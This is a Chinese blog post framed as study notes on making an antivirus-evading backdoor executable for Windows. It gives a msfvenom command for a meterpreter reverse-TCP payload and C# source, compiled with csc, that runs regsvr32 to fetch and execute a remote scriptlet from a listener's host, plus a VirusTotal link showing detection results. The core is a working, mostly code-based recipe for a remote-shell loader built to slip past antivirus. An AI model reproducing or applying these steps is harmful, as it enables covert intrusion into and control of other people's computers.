exe文件,后门免杀的制作学习笔记

引用原文!!

注:本文技术非原创,转载请直接对原文转载,请不要对本文打赏等,本文为学习笔记,禁止由本文产生任何盈利行为。

需要(Framework),一般Windows环境都有,
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=5555 X > shell.exe

kali下生成后门文件。直接查杀,发现很多报毒。
原文要求生成一个sct文件,然后放到你的web服务的目录中,实现监听。

制作后门文件:
1、cmd必须给与管理员权限
2、cmd下,

cd C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\

C:\Windows\Microsoft.NET\Framework\v2.0.50727>csc /t:exe /out:aaa.exe regsvr32.cs

/t:exe意思是,输出exe文件。
/out:aaa.exe意思是,输出名字叫aaa的exe文件。
regsvr32.cs就是我们利用做免杀的c#文件。
https://github.com/pasahitz/regsvr32
regsvr32.cs这个文件需要单独编辑

using System;
using System.Runtime.InteropServices;

namespace Regsvr

{ public class CMD
    { [DllImport("msvcrt.dll")]
        public static extern int system(string cmd);
        public static void Main()
        { system("regsvr32 /s /n /u /i:http://监听者IP:监听的端口/你刚才生成的sct文件 scrobj.dll");
        }}}

免杀后杀毒报告:https://www.virustotal.com/zh-cn/file/4f5801be2516cc8cfe4a73d00d44ca399c5bc116e9ac0d7f9f7a9aa29dca6f65/analysis/1495456458/

Malwarebytes这个杀毒软件好强悍。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 批处理学习及实际应用
    个人学习批处理的初衷来源于实际工作;在某个迭代版本有个BS(安卓手游模拟器)大需求,从而在测试过程中就重复涉及到...
    Luckykailiu阅读 4,760评论 0 11
  • 批处理
    dos 批处理 一:windows的命令行模式(win+R)在里面写CMD就可以进入windows的命令行模式了二...
    chenchao981阅读 756评论 0 6
  • NTFS隐写
    引言 这篇文章介绍Windows下NTFS文件系统的ADS(alternate data streams,交换数据...
    查无此人asdasd阅读 3,350评论 0 0
  • 香香隐退传
    香香不知何许人也,亦不详其缪字,公司有女主播,因以为号焉 。闲静少言,不慕荣利。好做号,不求扫雷;每有广告,便欣然...
    绽放的黑玫瑰阅读 196评论 0 1
  • 仿刘同:二十岁那年一去不复返
    1 18岁那一年,你刚刚拿到大学的录取通知书,你笑的很甜,寒窗苦读12年,你终于完成18岁之前最重要的目标。那一天...
    沿海小生阅读 1,369评论 5 29